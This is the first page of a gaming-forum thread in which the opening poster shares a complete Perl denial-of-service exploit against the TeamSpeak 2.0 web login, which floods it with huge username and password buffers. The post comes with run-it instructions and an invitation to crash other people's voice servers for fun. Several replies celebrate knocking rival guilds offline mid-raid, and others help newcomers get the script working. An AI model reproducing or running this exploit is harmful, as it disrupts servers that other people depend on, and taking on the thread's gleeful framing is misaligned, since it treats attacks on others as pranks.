Crash a TeamSpeak Server menu

User Tag List

Page 1 of 3 123 LastLast
Results 1 to 15 of 31
  1. #1
    Cypher's Avatar Kynox's Sister's Pimp
    Reputation
    1356
    Join Date
    Apr 2006
    Posts
    5,368
    Thanks G/R
    0/4
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Crash a TeamSpeak Server

    I figured this belonged in here because it is WoW related given that TS is one of the main programs people use when raiding.

    So, ever had the urge to be a massive dick? Well, now you can satisfy that urge, by crashing someone's TS server.

    Required Knowledge:
    Perl (http://www.activestate.com/Products/activeperl/)
    IP/Port of TS Server
    Common Sense

    Instructions:
    Copy+Paste the exploit code into the file "teamspeak.pl"
    Change the target IP and port to that of the TS server you want to crash
    Execute the script
    Proceed to lol as the server dies

    #!/usr/bin/perl

    # TeamSpeak 2.0 (Windows Release) Remote D0S Exploit by Yag Kohha (skyhole [at] gmail.com)
    # Vendor URL: http://www.goteamspeak.com/
    # TeamSpeak WebServer has no tcp session expire and no checks for incoming values length.
    # TODO:
    # Edit $target value
    # Run script
    # CPU 100%, Memory up for 1.2 Gb per one attack session.
    # Greetz: str0ke & milw0rm proj

    use IO::Socket;

    $target = 'xxx.xxx.xxx.xxx';
    $port_tcp=14534;

    $buffer_ascii= 'A' x 0xc00000;
    $buffer_dig= '659090';
    $req = "username\=$buffer_ascii\&password\=$buffer_ascii\&serverport\=$buffer_dig\&subm it\=Login";
    $uagent = 'Mozilla 5.0';
    my $res;
    my $tmp;

    print "\nStarting D0S\n\n";
    my $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$target", PeerPort=>"$port_tcp") or die "\n Could not connect to host\n\n";

    print $sock "POST /login.tscmd HTTP/1.1\r\n";
    print $sock "Host: ".$target."\r\n";
    print $sock "User-Agent: ".$uagent."\r\n";
    print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n";
    print $sock "Accept-Language: it-it,it;q=0.8,en-us;q=0.5,en;q=0.3\r\n";
    print $sock "Accept-Encoding: gzip,deflate\r\n";
    print $sock "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
    print $sock "Connection: close\r\n";
    print $sock "Referer: http://".$target."/slogin.html\r\n";
    print $sock "Content-Type: application/x-www-form-urlencoded\r\n";
    print $sock "Content-Length: ".length($req)."\r\n\r\n";
    print $sock $req;
    print $sock "\n";

    while ( $res = <$sock> ) {
    $tmp.= $res;
    }
    print $tmp;
    close($sock);

    # milw0rm.com [2007-07-20]
    Last edited by Cypher; 08-02-2007 at 08:53 AM.

    Crash a TeamSpeak Server
  2. #2
    Dragonshadow's Avatar ★ Elder ★
    Reputation
    1170
    Join Date
    Apr 2007
    Posts
    3,858
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Re: Crash a TeamSpeak Server

    Lol! I have no idea what this means but it is cool :P.

    I'll have to try it sometime.
    Look at your post, now back to mine; Now back to your post, now back to mine. Sadly, it isn't mine, but if you stopped trolling and started posting legitimate content, it could look like mine. Look down, backup, where are you? You're scrolling through threads, reading the post your post could look like. What did you post? Back at mine; It's a reply saying something you want to hear. Look again and the reply is now diamonds.

    Anything is possible when you think before you post. The moon is shrinking.

  3. #3
    sineater213's Avatar Banned
    Reputation
    138
    Join Date
    Apr 2007
    Posts
    970
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Re: Crash a TeamSpeak Server

    omg this is such a good prank in my guild we have a team A and B and we are very competitive so when A is doing a boss BAM! dced

  4. #4
    Cypher's Avatar Kynox's Sister's Pimp
    Reputation
    1356
    Join Date
    Apr 2006
    Posts
    5,368
    Thanks G/R
    0/4
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Re: Crash a TeamSpeak Server

    Originally Posted by sineater213 View Post
    omg this is such a good prank in my guild we have a team A and B and we are very competitive so when A is doing a boss BAM! dced
    See, that's what the spirit of being an arsehole is all about.

  5. #5
    Marlo's Avatar Banned
    Reputation
    84
    Join Date
    Jul 2006
    Posts
    2,453
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Re: Crash a TeamSpeak Server

    haha, you use milw0rm? :P

  6. #6
    Saint-Pasdoy's Avatar Banned
    Reputation
    219
    Join Date
    Dec 2006
    Posts
    1,172
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Re: Crash a TeamSpeak Server

    ewally to be true, i dont understand :P. i click on the link and i must downlaod what? afetr i downloaded this, what i do ? u talk about a code, this is the code a the end of ur post?

  7. #7
    Cypher's Avatar Kynox's Sister's Pimp
    Reputation
    1356
    Join Date
    Apr 2006
    Posts
    5,368
    Thanks G/R
    0/4
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Re: Crash a TeamSpeak Server

    Originally Posted by Marlo View Post
    haha, you use milw0rm? :P
    RSS feeds ftw.

    Originally Posted by pasdoy View Post
    ewally to be true, i dont understand :P. i click on the link and i must downlaod what? afetr i downloaded this, what i do ? u talk about a code, this is the code a the end of ur post?
    Download and install Perl, edit and run script. It's pretty simple.

  8. #8
    The Mars Volta's Avatar Active Member
    Reputation
    51
    Join Date
    Oct 2006
    Posts
    197
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Re: Crash a TeamSpeak Server

    Good find, ill use it

    The Mars Volta

  9. #9
    piller's Avatar Contributor
    Reputation
    82
    Join Date
    May 2007
    Posts
    103
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Re: Crash a TeamSpeak Server

    tried it while friendguild was raiding. funny as hell just like the ts-fakeplayer
    Last edited by piller; 08-03-2007 at 11:00 AM.

  10. #10
    killerxxx92's Avatar Member
    Reputation
    7
    Join Date
    Nov 2006
    Posts
    32
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Re: Crash a TeamSpeak Server

    Pearl costs $$$ and where is the file to put the code into?

    +rep if u help me to make it work (:

    Thanks

  11. #11
    piller's Avatar Contributor
    Reputation
    82
    Join Date
    May 2007
    Posts
    103
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Re: Crash a TeamSpeak Server

    open notepad and paste the text above. go to "file" "save as" change the "text" to "all files" at the bottom in the "save as" window.
    name the file teamspeak.pl
    there you go

  12. #12
    T@rget's Avatar Contributor
    Reputation
    91
    Join Date
    Nov 2006
    Posts
    223
    Thanks G/R
    2/3
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Re: Crash a TeamSpeak Server

    Heya, when i start the DOS it just says Starting DOS that's all

  13. #13
    piller's Avatar Contributor
    Reputation
    82
    Join Date
    May 2007
    Posts
    103
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Re: Crash a TeamSpeak Server

    start it in console. you should get errormessage. and with that you know what might be wrong

  14. #14
    Saint-Pasdoy's Avatar Banned
    Reputation
    219
    Join Date
    Dec 2006
    Posts
    1,172
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Re: Crash a TeamSpeak Server

    same prob for me

  15. #15
    killerxxx92's Avatar Member
    Reputation
    7
    Join Date
    Nov 2006
    Posts
    32
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Re: Crash a TeamSpeak Server

    Please! Help the noobs!

    Ive done all this but all it says is: "Starting in DOS"... And then it vanishes

Page 1 of 3 123 LastLast

Similar Threads

  1. Replies: 6
    Last Post: 01-03-2008, 02:14 AM
  2. Crashing a WoW-Server- Would These Methods Work?
    By mafiaboy in forum World of Warcraft Emulator Servers
    Replies: 20
    Last Post: 12-31-2007, 07:17 AM
  3. how to shutdown a teamspeak server with no admin rights
    By blargz in forum World of Warcraft Exploits
    Replies: 12
    Last Post: 11-20-2007, 04:07 PM
  4. a Teamspeak server
    By ~Jagris in forum Community Chat
    Replies: 8
    Last Post: 06-29-2007, 09:58 PM
  5. WoWGlider Teamspeak Server
    By Cypher in forum World of Warcraft Bots and Programs
    Replies: 11
    Last Post: 01-07-2007, 08:36 PM
All times are GMT -5. The time now is 09:17 AM. Powered by vBulletin® Version 4.2.3
Copyright © 2024 vBulletin Solutions, Inc. All rights reserved. User Alert System provided by Advanced User Tagging (Pro) - vBulletin Mods & Addons Copyright © 2024 DragonByte Technologies Ltd.
Digital Point modules: Sphinx-based search